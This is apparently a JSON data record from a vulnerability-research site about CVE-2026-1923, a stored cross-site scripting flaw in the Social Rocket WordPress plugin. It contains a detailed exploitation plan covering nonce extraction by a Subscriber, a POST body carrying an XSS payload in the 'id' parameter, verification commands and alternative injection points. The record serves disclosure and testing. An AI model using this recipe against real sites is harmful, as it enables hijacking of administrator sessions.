[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-qflVmJpzZdXYX5hiaCxSYEzwkXmjl685IR5RDLOTYo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-1923","social-rocket-social-sharing-plugin-authenticated-subscriber-stored-cross-site-scripting-via-id","Social Rocket – Social Sharing Plugin \u003C= 1.3.4.2 - Authenticated (Subscriber+) Stored Cross-Site Scripting via id","The Social Rocket – Social Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 1.3.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","social-rocket",null,"\u003C=1.3.4.2","1.3.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-22 12:47:30","2026-04-23 01:24:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd92fc04e-201e-4fc3-bbf0-4f2f3de3ee95?source=api-prod",1,[22,23,24,25],"admin\u002Fincludes\u002Fclass-social-rocket-admin.php","admin\u002Fjs\u002Fadmin.js","readme.txt","social-rocket.php","researched",false,3,"This research plan outlines the steps to demonstrate a Stored Cross-Site Scripting (XSS) vulnerability in the Social Rocket plugin (\u003C= 1.3.4.2). The vulnerability allows a Subscriber-level user to inject malicious scripts via the `id` parameter in a settings-save AJAX action, which then executes when an administrator views the Click to Tweet settings page.\n\n### 1. Vulnerability Summary\n*   **ID**: CVE-2026-1923\n*   **Vulnerability**: Authenticated Stored XSS\n*   **Vulnerable Parameter**: `id`\n*   **Affected Endpoint**: `wp-admin\u002Fadmin-ajax.php` via the `social_rocket_tweet_settings_save` action.\n*   **Cause**: The plugin registers AJAX handlers for managing \"Click to Tweet\" settings\u002Fstyles but fails to perform capability checks (like `current_user_can('manage_options')`). Additionally, it stores the `id` parameter with insufficient sanitization and later outputs it in the admin interface without proper escaping.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action**: `social_rocket_tweet_settings_save`\n*   **Authentication**: Required (Subscriber or higher)\n*   **Payload Parameter**: `id`\n*   **Vulnerable Context**: The `id` is used as a key or identifier for custom Click to Tweet styles and is rendered in the admin dashboard (likely within the \"Click to Tweet\" settings tab).\n\n### 3. Code Flow\n1.  **Registration**: `Social_Rocket_Admin::__construct` (in `admin\u002Fincludes\u002Fclass-social-rocket-admin.php`) registers several AJAX actions, including `social_rocket_tweet_settings_save`.\n2.  **Access**: These actions are registered using `wp_ajax_`, making them accessible to any logged-in user.\n3.  **Lack of Authorization**: The handler function `tweet_settings_save` (and others like `tweet_settings_update`) likely verifies a nonce but lacks a `current_user_can` check.\n4.  **Storage**: The `id` parameter is received from `$_POST['id']` and saved into the WordPress options table (likely within an array under `social_rocket_settings` or `social_rocket_tweet_styles`).\n5.  **Sink**: When an administrator navigates to **Social Rocket > Click to Tweet**, the plugin retrieves the saved styles and iterates through them. The `id` is printed into the HTML (e.g., as part of a list or a data-attribute) without using `esc_attr()` or `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin localizes a JavaScript object named `socialRocketAdmin` in the WordPress admin area. This object contains the necessary nonce.\n\n1.  **Preparation**: Since the plugin enqueues its admin scripts on all admin pages (including the user profile), a Subscriber can access it.\n2.  **Navigation**: Use the browser to log in as a Subscriber and navigate to `\u002Fwp-admin\u002Fprofile.php`.\n3.  **Extraction**: Use `browser_eval` to extract the nonce from the `socialRocketAdmin` object.\n    *   **Variable Name**: `socialRocketAdmin`\n    *   **Nonce Key**: `nonce` (verifiable via `browser_eval(\"window.socialRocketAdmin\")`)\n    *   **Action String**: Likely `social_rocket_nonce` or similar (localized in the `nonce` key).\n\n### 5. Exploitation Strategy\n1.  **Login**: Authenticate as a Subscriber user.\n2.  **Nonce Extraction**:\n    *   Navigate to `\u002Fwp-admin\u002Fprofile.php`.\n    *   Execute: `NONCE = browser_eval(\"window.socialRocketAdmin.nonce\")`.\n3.  **Injection**: Send a POST request to `admin-ajax.php` to save a malicious \"tweet style\".\n    *   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method**: `POST`\n    *   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n    *   **Body**:\n        ```\n        action=social_rocket_tweet_settings_save\n        &nonce=[EXTRACTED_NONCE]\n        &id=style-\">\u003Cimg src=x onerror=alert(document.domain)>\n        &settings[tweet_text]=Test\n        &settings[tweet_username]=testuser\n        ```\n4.  **Triggering**: Log in as an Administrator and navigate to the plugin settings:\n    *   **URL**: `\u002Fwp-admin\u002Fadmin.php?page=social_rocket_click_to_tweet`\n\n### 6. Test Data Setup\n*   **User**: A user with the `subscriber` role.\n*   **Plugin State**: Ensure Social Rocket is active. No existing \"Click to Tweet\" styles are required, as the exploit creates one.\n\n### 7. Expected Results\n*   The AJAX request should return a success response (likely a JSON object with `success: true`).\n*   The payload `style-\">\u003Cimg src=x onerror=alert(document.domain)>` will be stored in the database.\n*   When an administrator views the \"Click to Tweet\" settings page, an alert box showing the document domain will appear.\n\n### 8. Verification Steps\n1.  **Database Check**: Use WP-CLI to inspect the stored settings:\n    ```bash\n    wp option get social_rocket_tweet_settings --format=json\n    ```\n    Confirm that the `id` key in the settings array contains the malicious payload.\n2.  **HTML Inspection**: Use `http_request` as an administrator to fetch the settings page and check for the unescaped payload:\n    ```bash\n    # Look for the onerror attribute in the response body\n    http_request(url=\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=social_rocket_click_to_tweet\")\n    ```\n\n### 9. Alternative Approaches\n*   **Shortcode Context**: If the `id` is also echoed when the `[social_rocket_tweet id=\"...\"]` shortcode is used on the frontend, check if the injection triggers for any user viewing a post containing that shortcode.\n*   **`tweet_settings_update`**: If `save` is restricted, attempt the `social_rocket_tweet_settings_update` action, which likely follows the same vulnerable pattern.\n*   **Parameter Variation**: If the `id` parameter itself is escaped, check if keys inside the `settings` array (e.g., `settings[tweet_text]`) are also unescaped when rendered in the admin preview.","gemini-3-flash-preview","2026-04-27 13:46:35","2026-04-27 13:47:19",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.3.4.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-rocket\u002Ftags\u002F1.3.4.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsocial-rocket.1.3.4.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-rocket\u002Ftags\u002F1.3.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsocial-rocket.1.3.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-rocket\u002Ftags"]